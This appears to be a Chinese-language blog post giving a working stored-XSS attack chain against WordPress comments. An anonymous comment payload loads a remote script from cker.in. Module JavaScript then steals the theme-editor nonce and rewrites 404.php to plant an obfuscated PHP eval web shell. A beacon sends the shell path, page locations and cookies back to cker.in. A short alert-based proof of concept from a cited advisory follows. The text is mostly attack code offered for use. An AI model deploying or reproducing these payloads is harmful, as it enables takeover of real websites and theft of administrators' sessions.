完美payload
<abbr title="qweqw style=display:block;width:9900px;position:absolute;height:9900px;top:-100px;left:-100px; onmouseover=eval(unescape(/with%28document%290%5Bbody.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2fcker.in%2f2oPaSh%27%5D/.source))// ">
(由于博客程序处理,截断效果的此实体字符显示不出来,“ ,https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/)
匿名评论后前台触发,覆盖率全屏窗口
添加Xsser平台模块的接收参数:shell,用来接收getshell地址
xsser平台模块代码(Ajax Getshell)
var xmlHttp;var content404,theme,_wpnonce,content ;
function createXMLHttpRequest() {
if (window.ActiveXObject) {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
else if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
}
}
function doRequest(url) {
createXMLHttpRequest();
xmlHttp.onreadystatechange = handleStateChange;
xmlHttp.open("GET", url, true);
xmlHttp.send(null);
}
function handleStateChange() {
if(xmlHttp.readyState == 4) {
//alert(xmlHttp.responseText)
content404 = xmlHttp.responseText;
theme = new RegExp("<input type=\"hidden\" name=\"theme\" value=\"(.+?)\" />").exec(content404)[1]
_wpnonce = new RegExp("<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"(.+?)\" />").exec(content404)[1]
content = new RegExp("(:?aria-describedby=\"newcontent-description\">)([^<]+)").exec(content404)[2]+"<script language=\"php\">fputs(fopen(chr(46).chr(47).chr(65).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(65).chr(93).chr(41).chr(59).chr(63).chr(62));</script>"
//Post code
var data = "_wpnonce="+_wpnonce+"&_wp_http_referer="+window.location.pathname+"&newcontent="+escape(content)+"&action=update&file=404.php&theme="+theme+"&scrollto=10&docs-list=&submit=submit"
doPostRequest("./wp-admin/theme-editor.php",data)
}
}
doRequest("./wp-admin/theme-editor.php?file=404.php")
function doPostRequest(url,data) {
createXMLHttpRequest();
xmlHttp.onreadystatechange = handleStateChangePost;
xmlHttp.open("POST", url, true);
xmlHttp.send(data);
}
function handleStateChangePost() {
if(xmlHttp.readyState == 4) {
//get 404
doRequest2("./index.php?p=9999999999999998888")
}
}
function doRequest2(url) {
createXMLHttpRequest();
xmlHttp.onreadystatechange = handleStateChange3;
xmlHttp.open("GET", url, true);
xmlHttp.send(null);
}
function handleStateChange3()
{
if(xmlHttp.readyState == 4) {
//(function(){(new Image).src="http://cker.in/index.php?do=api&id={projectId}&shell="+document.location.origin+document.location.pathname+"./A.php AAA"}())
//(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php') })()
(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php')+'&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})())})()
}
}
http://klikki.fi/adv/wordpress2.html
Proof of Concept
Enter as a comment text:
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>